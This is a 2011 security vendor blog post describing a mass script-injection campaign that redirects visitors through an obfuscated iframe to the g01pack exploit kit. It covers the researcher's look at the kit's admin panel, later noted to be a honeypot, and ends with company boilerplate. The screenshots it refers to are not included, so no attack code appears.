April 18, 2011

Mass Injections Leading to g01pack Exploit Kit

Chris Astacio

Our ThreatSeeker® Network is constantly on the lookout to protect our customers from malicious attacks.  Recently it has detected a new injection attack which leads to an obscure Web attack kit.  The injection has three phases which will be covered in this blog post. Websense customers are protected from this attack by ACE, our Advanced Classification Engine

The first phase of the attack is a typical vector for exploit kits to drive traffic to their sites: script injections.  Script HTML code is put on legitimate Web sites meant to drive traffic to the attack kits without the victim's knowledge.  In this case, legitimate sites are injected with malicious JavaScript. 

Screen shot of malicious script injection (Phase 1):


In the second phase, this script injection then pulls obfuscated content from another site.  The obfuscated content creates an iframe that is used to pull content from the exploit kit site.  

Screen shot of the obfuscated redirect site used in the above injection (Phase 2):


Screen shot of the deobfuscated redirection site:


The exploit kit can basically be described as a drive-by download site used in the third and final phase of this attack.  Its intent is to scan, attack, and run malicious code on the visitor's computer.  If one of the exploit kit's Web attacks is successful, it could put malware on a victim's computer that is meant to remotely control the computer.  The binary that this kit tries to run on target computers has low detection as a Rogue AV installation.  As is typical, the exploit kit's Web attack code is obfuscated.


Screen shot of obfuscated exploit kit code (Phase 3):


It's in cases like this that we can really harness the power of our ThreatSeeker® Network, not only to better protect our customers but also to perform further research into attacks!  With all of the scanning that ThreatSeeker® does, we get a large amount of data which we can correlate.  In this example, I can see all of the URLs associated with the IP address that this exploit kit was hosted on. 


Screen shot of URL report from hosting IP:


In the screen shot above, I've highlighted that there are a number of URLs with an "/admin/" directory.  Assuming that these are the same attack kits hosted on this IP, I can try to see if our attack host has the same page.  Sure enough, the attack site discussed in this blog follows the convention of other sites hosted on this IP.


Screen shot of the attack kit admin page:


Notice the title on the admin page: it has an email address for a group known as the Iranian Cyber Army.  This is a known attribute of a kit called g01pack malware tool.  We were able to access the admin panel and confirm that this site is hosting an installation of g01pack malware tool. 


Screen shot for g01pack admin statistics for this attack:



We are aware that the g01pack admin panel is in fact a faked honeypot tool used by attackers.  This admin "tool" is used to track researchers who try to access admin panels for attack kits, an interesting tactic.  However, the threat described in this blog is a very real threat and we are seeing other attack hosts on the same IP attacking visitors.  Seeing that there are other hosts on this IP which also host the fake admin panel, these hosts are seen as exploit kit attack code which could be used in the same script injection attacks as well as other injection attacks.  Thanks @briankrebs for getting in touch with us to clarify this post.

About Forcepoint

Forcepoint is the leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with data, providing secure access while enabling employees to create value.